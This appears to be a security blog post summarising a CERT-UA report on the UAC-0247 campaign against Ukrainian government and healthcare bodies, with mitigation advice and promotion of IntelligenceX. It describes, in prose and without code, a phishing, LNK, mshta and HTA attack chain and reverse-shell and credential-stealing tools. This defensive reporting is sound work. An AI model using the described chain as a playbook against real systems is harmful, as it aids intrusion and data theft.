Ukraine’s national cybersecurity authority, CERT-UA, has uncovered a new cyber campaign aimed at government bodies and healthcare institutions, particularly clinics and emergency medical services. The operation, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers as well as WhatsApp environments.
The activity was observed between March and April 2026, and while the exact origin of the threat group remains unclear, the level of sophistication suggests a well-organized and persistent actor. The campaign highlights how attackers are increasingly combining social engineering with multi-stage malware delivery techniques to compromise critical infrastructure.
Initial Access Through Social Engineering
The attack chain begins with carefully crafted phishing emails. These messages are disguised as humanitarian aid proposals, a theme likely chosen to exploit the ongoing geopolitical situation and increase the likelihood of engagement. Recipients are encouraged to click on embedded links, which redirect them to either compromised legitimate websites or attacker-controlled pages generated using artificial intelligence tools.
In cases involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. In other instances, entirely fake websites are created to mimic trusted entities. Regardless of the method, the objective remains the same: convince the user to download and execute a malicious file.
Execution Chain and Malware Deployment
Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file acts as the initial execution trigger. When opened, it leverages the native Windows utility “mshta.exe” to run a remote HTML Application (HTA).
The HTA file serves a dual purpose. On the surface, it displays a decoy form to distract the user and maintain the illusion of legitimacy. In the background, however, it initiates the download of a secondary payload. This payload injects shellcode into legitimate system processes such as runtimeBroker.exe, allowing the malware to operate stealthily.
CERT-UA also noted the use of a more advanced two-stage loader in some cases. The second stage is implemented using a custom executable format, complete with structured code sections and support for dynamic library imports. The final payload is both compressed and encrypted, making detection and analysis more difficult.
Remote Access and Command Execution
A key component of the attack is the deployment of a reverse shell utility known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.
Additional malware components include AGINGFLY and a PowerShell-based script referred to as SILENTLOOP. AGINGFLY, developed in C#, provides extensive control over compromised systems. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, keylogging, file downloads, and deployment of additional payloads.
SILENTLOOP enhances persistence and adaptability by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.
Data Theft and Post-Exploitation Activity
Investigations into multiple incidents linked to this campaign reveal that the attackers focus heavily on reconnaissance and lateral movement within compromised networks. Their ultimate goal is to extract sensitive information, particularly credentials and communication data.
To achieve this, the attackers deploy a variety of tools. These include utilities designed to bypass browser encryption mechanisms and extract stored credentials from Chromium-based applications. They also use forensic tools capable of decrypting WhatsApp Web data, allowing them to access private communications.
Additional tools observed in the campaign support network scanning, tunneling, and even cryptocurrency mining. This combination of capabilities suggests that the attackers are not only interested in espionage but may also be exploring financial gain as part of their operations.
There is also evidence indicating that members of Ukraine’s defense sector may have been targeted. In these cases, malicious archives were distributed through messaging platforms, further expanding the reach of the campaign.
Detection Challenges and Defensive Strategies
The complexity of this campaign makes it particularly difficult to detect. The use of legitimate system tools, encrypted payloads, and multi-stage loaders allows the malware to evade traditional security measures.
This is where platforms like IntelligenceX can provide significant value. By offering visibility into exposed infrastructure, malicious domains, and threat actor activity, IntelligenceX enables organizations to identify indicators of compromise earlier in the attack lifecycle.
For example, security teams can use IntelligenceX to track suspicious domains associated with phishing campaigns, monitor infrastructure linked to command-and-control servers, and correlate threat intelligence across multiple sources. This level of visibility is critical when dealing with advanced campaigns that rely on stealth and persistence.
Mitigation Recommendations
To reduce the risk posed by such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types, including LNK, HTA, and JavaScript files. Additionally, limiting the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe can help prevent attackers from abusing these tools.
Organizations should also invest in continuous monitoring, user awareness training, and threat intelligence integration to improve their overall security posture.
Conclusion
The UAC-0247 campaign underscores the evolving nature of cyber threats targeting critical infrastructure. By combining social engineering, advanced malware techniques, and legitimate system tools, attackers are able to operate with a high degree of stealth and effectiveness.
In this environment, proactive defense strategies and enhanced visibility are essential. Leveraging platforms like IntelligenceX, alongside strong internal security practices, can help organizations detect and respond to threats before they escalate into full-scale incidents.
Top comments (0)